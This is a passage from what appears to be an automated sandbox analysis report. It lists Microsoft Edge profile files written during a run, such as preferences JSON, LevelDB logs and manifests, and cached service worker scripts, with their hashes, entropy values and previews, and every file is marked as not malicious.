"},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f790.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF42c4c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF45466.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4b34e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF5a129.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF85db9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.201029866963112
Encrypted:	false
SSDEEP:	6:HUwfheq1923oH+TcwtgctZQInvB2KLlVUwJ+q2P923oH+TcwtgctZQInvIFUv:5fwYebgGZznvFLREv4YebgGZznQFUv
MD5:	323D468341F029176FA823F14B046873
SHA1:	EA750E08B4AAC70BED6E7A8F341CC8FED9154DC3
SHA-256:	76E8EEE0C1A5659F39ECDE435E0D5EF0101B2B2E2A3981DF72165C92D084D1AB
SHA-512:	3ADAB3AF0B15EDE0D2C392D1BD368DA704336F18284A4C53446BBE6B8756909977320CFB2A4A04D466B1BF911EC18C3645FD6B8783C023CC47392AA158455E25
Malicious:	false
Preview:	2024/11/13-14:41:55.904 938 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db since it was missing..2024/11/13-14:41:55.937 938 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	38626
Entropy (8bit):	5.554873169793035
Encrypted:	false
SSDEEP:	768:pCt2Yv7pLGLp7JWPU6fZu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVhb4pbrwzvOw1qG:pCt2Ypcp7JWPU6fZuu1jaoEpwzvOwk1k
MD5:	AC851C8ACE81FEEA0D0BE6464F253772
SHA1:	A7822986DFD9D519E134082439D16D347FB43AD0
SHA-256:	63DB97FFC43BE084F2F196951B9B823FC3C558F4D95D9FAACB701BCC67F36D12
SHA-512:	B1928C37FF63525D6850C03D0899F831E3E32460B68EE2E7600B302FBA9EF556F2336DA1DB2D6DB48D976042A113943AD00B3AAA68A49C87DF7A0BB0C3E57B09
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376000376727965","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376000376727965","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF41067.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	38626
Entropy (8bit):	5.554873169793035
Encrypted:	false
SSDEEP:	768:pCt2Yv7pLGLp7JWPU6fZu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVhb4pbrwzvOw1qG:pCt2Ypcp7JWPU6fZuu1jaoEpwzvOwk1k
MD5:	AC851C8ACE81FEEA0D0BE6464F253772
SHA1:	A7822986DFD9D519E134082439D16D347FB43AD0
SHA-256:	63DB97FFC43BE084F2F196951B9B823FC3C558F4D95D9FAACB701BCC67F36D12
SHA-512:	B1928C37FF63525D6850C03D0899F831E3E32460B68EE2E7600B302FBA9EF556F2336DA1DB2D6DB48D976042A113943AD00B3AAA68A49C87DF7A0BB0C3E57B09
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376000376727965","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376000376727965","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.836048635517058
Encrypted:	false
SSDEEP:	24:F2xc5NmFcncmo0CRORpllg2DCfRHsbVdCRORpllg2fo0kgKCRORpllg2DdRHsb/Q:F2emmtrdDCfB6XrdfVCrdDdBcrdaBv
MD5:	6FC24FD691DD74D79A93B7C9268096D5
SHA1:	CACED281D5941E25112459C0863172677CBF0C7D
SHA-256:	828AAE01B3F502CF0CD83B6506C6980D8BC2EBF81C06678553D85424067D256F
SHA-512:	2F7CC14B123170FB81D4A940E8C51E81BBF019CA18606725CDF2DB5334407DF34296B9BE252525F6344E083582CF3F7ABFC828918C09D66D230D860DECB3FB5D
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2....m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.168843047979215
Encrypted:	false
SSDEEP:	6:HUtpDR1923oH+TcwtE/a252KLlVUtpIbF39+q2P923oH+TcwtE/a2ZIFUv:yD8Yeb8xLK6N+v4Yeb8J2FUv
MD5:	EA8ADB3B0BF4D9E6A496F72CC67B4CF8
SHA1:	F8EAD46BA1382175E88A094CA38E0B4BF26147E8
SHA-256:	06A4674C25755C62E10B5285752156C79D384C067E9CA5CDF7EB40965DAFAE0E
SHA-512:	808B2C747BCC1C4D69907D4744498DD63C315EE74102CA0C6BE6E1B37EEFD8279806F81B91E1CC19E1FB00C4919E9F9D7EAC5097770826D18B198914DBEC5E4F
Malicious:	false
Preview:	2024/11/13-14:39:50.903 1dbc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/13-14:39:50.917 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113994
Entropy (8bit):	5.578652311252192
Encrypted:	false
SSDEEP:	1536:Aa906yxPXfOrr1lhCe1nL/rmL/rSZXsCjaWNcHMNjVrWzxD:79LyxPXfOrr1lMe1nL/CL/SXsA8Q5SV
MD5:	23683FD3A5C0418E12D6EAB114E73A7D
SHA1:	C2357EF23F9B2BF4A250AF4086461DF5E2ED03EA
SHA-256:	B29CAC2339AA50B5F457A564A4B83C4B3FC66D08E6E1ECFC463EEAF40CFABD1E
SHA-512:	08AA95BD47398733996960FC920FF0B2A673B8D3532041722B587DE211603A4B5E51BE6D6C4B3FD3C674937F770D69A0FC6D5886768861ADB717B88EAE7B2628
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188241
Entropy (8bit):	6.382246455361732
Encrypted:	false
SSDEEP:	3072:SzB/I4UKKQkfewjZHgDeL/DwMBgpC45Jg8ihypxAG:9rewdgiL/8GgT5S8imF
MD5:	6EBBBF935CBD2CD23B06FA78A9329148
SHA1:	CB2A81BC9604970B2B344267DD7F5036996AC18D
SHA-256:	5C502B75881DEF71A5A043575DF9B04AC26C6DDC11B67C7E48B880DD8CCC02DA
SHA-512:	6C4F734D87E07ABAD239ECFEC03D4AB26ED6CC4A33CC5E602B84328842445C1A0567261063A7EE6F575AB875F3FD0E264301DCB592B42A332F4BFD09C56424F7
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;I....x..........,T.8..`,.....L`.....,T...`......L`......Rc.c=.....exports...Rc2y......module....Rc.)......define....RbZ&......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m...;4b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....V...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
